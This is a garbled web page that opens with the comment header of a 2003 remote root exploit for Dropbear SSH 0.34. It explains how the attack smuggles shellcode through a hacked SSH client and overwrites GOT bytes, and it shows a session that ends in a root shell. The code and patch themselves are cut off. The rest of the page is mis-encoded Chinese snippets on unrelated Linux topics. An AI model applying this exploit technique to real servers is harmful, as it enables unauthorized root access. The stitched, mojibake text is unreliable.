Linux x86 Dropbear SSH <= 0.34 remote root exploit
/*
* /*
* Linux x86 Dropbear SSH <= 0.34 remote root exploit
* coded by live
*
* You'll need a hacked ssh client to try this out. I included a patch
* to openssh-3.6.p1 somewhere below this comment.
*
* The point is: the buffer being exploited is too small(25 bytes) to hold our
* shellcode, so a workaround was needed in order to send it. What I did here
* was to hack the ssh client so that it sends the local environment variable
* SHELLCODE as ssh's methodname string. This method was described by Joel
* Eriksson @ 0xbadc0ded.org.
*
* The 25 bytes limitation is also the reason for the the strange ``2 byte''
* retaddr you will see here. That's not enough for complete pointer overwrite,
* so I decided to overwrite 3rd and 2nd bytes and hope our shellcode is
* around ;)
*
* % telnet localhost 22
* Trying 127.0.0.1...
* Connected to localhost.
* Escape character is '^]'.
* SSH-2.0-dropbear_0.34
* ^]
* telnet> quit
* Connection closed.
*
* % objdump -R /usr/local/sbin/dropbear| grep malloc
* 080673bc R_386_JUMP_SLOT malloc
*
* % drop-root -v24 localhost
* ?.2022u%24$hn@localhost's password:
* Connection closed by 127.0.0.1
*
* % telnet localhost 10275
* Trying 127.0.0.1...
* Connected to localhost.
* Escape character is '^]'.
* id; exit;
* uid=0(root) gid=0(root) groups=0(root)
* Connection closed by foreign host.
*
* In the above example we were able to lookup a suitable .got entry(used as
* retloc here), but this may not be true under a hostile environment. If
* exploiting this remotely I feel like chances would be greater if we attack
* the stack, but that's just a guess.
*
* Version pad is 24 to 0.34, 12 to 0.32. I don't know about other versions.
*
* gr33tz: ppro, alcaloide and friends.
*
* 21.08.2003
* Please do not distribute
*/
/*
--- sshconnect2.c2003-08-21 21:34:03.000000000 -0300
+++ sshconnect2.c.hack2003-08-21 21:33:47.000000
Ïà¹ØÎĵµ£º
´´½¨×ÀÃæͼ±ê
Ä¿Ç°½«ÍøÂçÓ¦ÓÃÀ©Õ¹µ½×ÀÃæÊÇÒ»¸öÇ÷ÊÆ£¬´æÔÚןܶà½â¾ö·½°¸£¬±¾ÎÄÒÔ Mozilla Prism ΪÀý£¬ÀàËƵķ½·¨Í¬ÑùÊÊÓÃÓÚ Google Chrome ¡£
1. µ½ Mozilla Prism µÄÍøÕ¾ÉÏÏÂÔØ Prism£¬µã»÷ Download Now Ö®ºó»áÌáʾÓÐÁ½ÖÖ£¬Ò»ÖÖÊÇÒÔ Mozilla Firefox À©Õ¹µÄ·½Ê½£¬ÊʺÏÒѾ°²×°ÓÐ Firefox µÄÅóÓÑ£»Ò»Ö ......
1¡¢¼ì²â
°²×°Ö®Ç°Ïȼì²âÊÇ·ñÕâЩÈí¼þ°üÒÑ°²×°£¬·½·¨ÈçÏ£º[root@localhost
root]#rpm -q telnet»ò[root@localhost root]#rpm -q telnet-client
[root@localhost root]#rpm -q
telnet-server
Èç¹ûûÓмì²âµ½Èí¼þ°ü£¬ÐèÒª½øÐа²×°£¬¾Ý˵red hat Linux
9ĬÈÏÒÑ°²×°ÁËtelnetÈí¼þ°ü£¬²»ÖªµÀΪʲôÎÒµÄûÓУ¬»¹ºÃû¹Øϵ£ ......
4ÔÂ19ÈÕ£¬²Ù×÷½çÃæ½â¾ö·½°¸ÌṩÉÌSynaptics Inc.Ðû²¼ÁËÒ»Ì×ÓÃÓÚLinuxϵ統µÄ Synaptics Gesture Suite¿ª·¢Ì××°£¨SGS-L£©£¬Õâ¿îÈí¼þ½«´ø¸ø¿ªÔ´LinuxϵͳÒÔ¶àµã´¥ÃþµÄÄÜÁ¦¡£
SGS-LÖ§³Ö眾¶àµÄLinux·¢ÐаæÈçFedora, Millos Linpus, Red Flag, SuSE, UbuntuºÍXandros£¬並ÌØ別Ìá¼°¿ÉÍØÕ¹Chrome OSµÄй¦Ä ......
LinuxÄں˴úÂë·ÖÎö slab.c by Áõ¿º liukang@bjut.edu.cn
slab.cÀ´×ÔlinuxÄÚºË2.4.22°æ£¬±¾Îļþ°´ÕÕGNUÐÒé·¢²¼¡£
Ò»¡¢×¼±¸ÖªÊ¶£º
slabµÄ¸ÅÄ
Ìá³öµÄÔÒò£ºÓÉÓÚ²Ù×÷ϵͳÔÚÔËÐÐÖл᲻¶Ï²úÉú¡¢Ê¹Óá¢ÊÍ·Å´óÁ¿Öظ´µÄ¶ÔÏó£¬
ËùÒÔ¶ÔÕâÑùµÄÖظ´¶ÔÏóµÄÉú³É½øÐиĽø¿ÉÒÔ´ó´óÌá¸ßЧÂÊ
×îÔçÓÉsunµÄ¹¤³ÌʦÌá³ö(1994Äê)²¢Ê×ÏÈÔ ......
Ìí¼ÓÓ²Å̺óÆô¶¯ÐéÄâ»ú£¬ Èç¹ûÌí¼ÓµÄSCSIÓ²ÅÌÕâʱӦ¸Ã¶à³öÒ»¸ösdb/sdc/..µÄÅÌ£¬¿ÉÒÔÓà fdisk -l ²é¿´µ½
·ÖÇøfdisk /dev/sdb ---> n p 1 »Ø³µ »Ø³µ w
¸ñʽ»¯mkfs -t ext3 -c /dev/sdb1
¹ÒÔص½Ä³¸öĿ¼ mount /dev/sdb1 /home
vi /etc/fstab Ìí¼ÓÒ»ÐÐ /dev/sdb1 /home ext3 defau ......
